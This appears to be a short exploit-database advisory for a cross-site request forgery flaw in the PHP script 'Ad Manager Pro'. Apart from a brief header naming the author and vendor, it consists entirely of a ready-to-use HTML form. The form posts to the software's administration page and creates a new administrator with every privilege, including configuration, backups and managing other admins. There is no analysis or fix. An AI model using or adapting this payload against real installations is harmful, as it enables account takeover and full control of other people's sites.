# Exploit Title: Ad Manager Pro CSRF Vuln (add admin) # Author: Jonturk75 # Vendor of Software Link: http://www.scripts.com/viewscript/php-text-ad-management/20881/ # Category:: webapps # Demo site: http://www.scripts-demo.com/admanagerpro/administration/index.php ------------------------------------------------------------------- <form method="post" action="admanagerpro/administration/index.php"/> <td align="left" nowrap="">Username </td> <td align="left" colspan="2"><input maxlength="15" value="" name="username" size="15" class="field10"/></td> </tr> <tr> <td align="left" nowrap="">Password </td> <td align="left" colspan="2"><input maxlength="15" name="password" size="15" class="field10"/></td> </tr><tr> <td align="left" nowrap="">Email </td> <td align="left" colspan="2"><input value="" maxlength="255" name="email" style="width: 550px;" class="field10"/></td> </tr> <tr> <td align="left" nowrap="">Name </td> <td align="left" colspan="2"><input value="" maxlength="255" name="name" style="width: 550px;" class="field10"/> <input type="hidden" value="admin_created" name="action"/> <input type="hidden" value="e8fc7411553641a471251382887a8ce3" name="x"/> <input type="hidden" value="" name="n"/><tbody><tr> <input type="checkbox" value="advertisers" name="rights[]"/> Create/edit/delete advertisers<br/> <input type="checkbox" value="packages" name="rights[]"/> Create/edit/delete advertising packages, prices<br/> <input type="checkbox" value="publishers" name="rights[]"/> Create/edit/delete publishers, publishing places, payments<br/> <input type="checkbox" value="ads" name="rights[]"/> Create/edit/delete ads<br/> <input type="checkbox" value="def_ads" name="rights[]"/> Create/edit/delete default ads<br/> <input type="checkbox" value="black_zones" name="rights[]"/> Blacklist, zones and keywords<br/> <input type="checkbox" value="backup" name="rights[]"/> Backup/restore database, optimize database<br/> <input type="checkbox" value="email_u" name="rights[]"/> Can email and send messages to users<br/> <input type="checkbox" value="reset" name="rights[]"/> Reset statistic, run Daily Job<br/> <input type="checkbox" value="tmpl_msg" name="rights[]"/> Templates, messages<br/> <input type="checkbox" value="admins" name="rights[]"/> Administrators<br/> <input type="checkbox" value="config" name="rights[]"/> Configuration, unistallation<br/> <tr><td align="center" colspan="3"><input type="submit" class="button10" value="Submit" name="submit"/></td></tr> </form>